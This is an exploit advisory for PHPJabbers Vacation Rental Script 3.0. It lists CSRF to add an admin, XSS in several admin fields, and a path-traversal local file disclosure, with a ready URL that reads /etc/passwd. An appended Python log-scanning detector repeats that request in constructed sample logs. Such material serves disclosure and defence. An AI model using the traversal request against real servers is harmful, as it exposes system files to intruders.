Vacation Rental Script V3.0 - Multiple Vulnerabilities
====================================================================
####################################################################
.:. Author         : HackXBack
.:. Contact        : h-b@usa.com
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : http://www.phpjabbers.com/vacation-rental-script/
.:. Tested On Demo : http://www.phpjabbers.com/demo/vrl_30/1389729977/index.php?controller=pjAdmin&action=pjActionLogin
####################################################################

===[ Exploit ]===

[1] Cross Site Request Forgery
==============================

[Add Admin]

[2] Multiple Cross Site Scripting
==================================

# CSRF with XSS Exploit:

I. XSS in Types
II. XSS in Features
III. XSS in Countries

[3] Local File Disclosure
========================

http://site/index.php?controller=pjBackup&action=pjActionDownload&id=../../../../../../../../etc/passwd

####################################################################
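
Detection sketch for item [3], added here as an example and not part of the original advisory or the vendor's code: it scans web access logs for pjBackup download requests whose id parameter contains a path-traversal segment, including percent-encoded and double-encoded forms. The log lines are constructed, the combined log format is assumed, and the benign backup file name is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

def _line(ip, target):  # builds one constructed combined-log-format entry
    return f'{ip} - - [14/Jan/2014:10:01:02 +0000] "GET {target} HTTP/1.1" 200 1204'

DL = "/index.php?controller=pjBackup&action=pjActionDownload&id="
# Constructed sample log (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    _line("203.0.113.7", DL + "../" * 8 + "etc/passwd"),  # request shape from item [3]
    _line("203.0.113.7", DL + "%252e%252e%252f%252e%252e%252fetc%252fpasswd"),  # double-encoded
    _line("198.51.100.20", DL + "backup-2014-01-14.sql"),  # assumed benign backup name
    _line("198.51.100.20", "/index.php?controller=pjAdmin&action=pjActionLogin"),
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# ".." as a whole path segment, with either slash style.
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so layered encodings are reduced to plain text."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_backup_download(log_line):
    """Return the decoded id if the line is a pjBackup download with a traversal-style id."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    if "pjBackup" not in query.get("controller", []):
        return None
    if "pjActionDownload" not in query.get("action", []):
        return None
    for raw in query.get("id", []):  # parse_qs has already decoded one layer
        ident = fully_decode(raw)
        if TRAVERSAL_RE.search(ident) or ident.startswith(("/", "\\")) or "\x00" in ident:
            return ident
    return None

def scan(lines):
    """Return (client_ip, decoded_id) for every suspicious download request."""
    return [(ln.split()[0], hit) for ln in lines if (hit := suspicious_backup_download(ln))]
```

A hit with a 200 status and a response size unlike a normal backup is worth prioritising when triaging.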